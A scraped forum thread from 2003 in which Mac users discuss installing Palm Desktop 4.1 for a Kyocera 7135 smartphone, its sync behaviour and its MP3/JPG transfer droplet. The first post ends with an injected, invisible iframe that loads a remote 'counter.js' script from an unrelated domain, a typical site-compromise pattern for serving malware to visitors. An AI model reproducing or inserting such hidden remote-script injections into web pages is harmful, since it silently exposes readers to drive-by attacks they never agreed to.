+ Reply to Thread

Palm software 4.1 for MAC OS X released 4-28-03

I was wondering if anyone has had a chance to play with this and if it wise to install over the 4.0 that came with the Kyocera 7135 CD? One of the new functions is that it now allows for drop sync of MP3's and photo's to the SD card without having to remove it and insert it into your card reader.

here is the link.

http://www.palm.com/support/macintosh/mac_desktop.html

On the same note, is it a big NO NO to use Palm versions of the palm software in place of the kyocera version, as I'm sure Palm will release new versions faster than when Kyocera will probably!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Well I crossed my fingers, backed everything up, and installed Palm Desktop 4.1 for Mac (I'm running 10.2.4).
    And so far so good.
    It even sync's properly without me having to first startup Conduit Manager, which was a workaround to a problem described in...
    http://www.smartphonesource.com/vbul...&threadid=6991

I haven't yet played with the SD card installer stuff. more later.

Thanks for the info, PLEASE keep us updated! Curious about jpeg and MP3 files from both iPhoto and iTunes being transfered through the HotSync program. Curious what folders it is installed into on the SD card.

The file transfer stuff seems to consist of a "droplet" -- an app onto which you drop either MP3 or JPG files. It seems to do little more than move files into the "SecureDigital (SD) Card" folder in /Users/yourname/Documents/Palm/Users/yourname/Files to Install. Which I suppose is useful for people who don't know how their directory is laid out. But seems a bit silly otherwise. I'd rather copy the files myself into the folders. And the folders it chooses don't seem suited for the 7135's apps.
    The files go directly into the top of the "SecureDigital (SD) Card" folder (i.e. an MP3 doesn't got into the "Audio" subfolder.

You get to pick whether you want the file sent to the handheld or to the SD card. (but again, if you know where the folders are, this isn't such a big deal).

One potentially useful thing: If you pick "handheld" for a JPG, it will convert the JPG to PDB. For MP3s, you can only select SD card.

There's a fairly thorough flaming of Palm on the "feedback" section of the Versiontracker website. Most Mac users seem rather disgusted with Palm's inability/unwillingness to do much with their software. Aside from this "droplet" (which is kind of worthless), very little has changed and very few bugs (if any) have been fixed. This is the same Palm Desktop that was barely functional under system 9, with a minor facelift for X.

However, given that I'm now able to synch effortlessly, i'll stick with 4.1

Thank you for the detailed info on the new version. I have NOT had any type of Sync issues with my NEW Verizon 7135 where as I did with the Alltel 7135. I think I will stick with the 4.0 that came with the Kyocera CD and upgrade the Alltel version that is on my other G4. Also since it does NOT move mp3's and JPG files into the correct folder I will also just do the drag copy. FYI, I have been using a program called Maclean

http://www.palmgear.com/software/sho...m?prodID=48493

that I use when ever I mount the SD card onto the desktop to transfer files, this will then delete all the OS X files that are made on the SD card from OS X.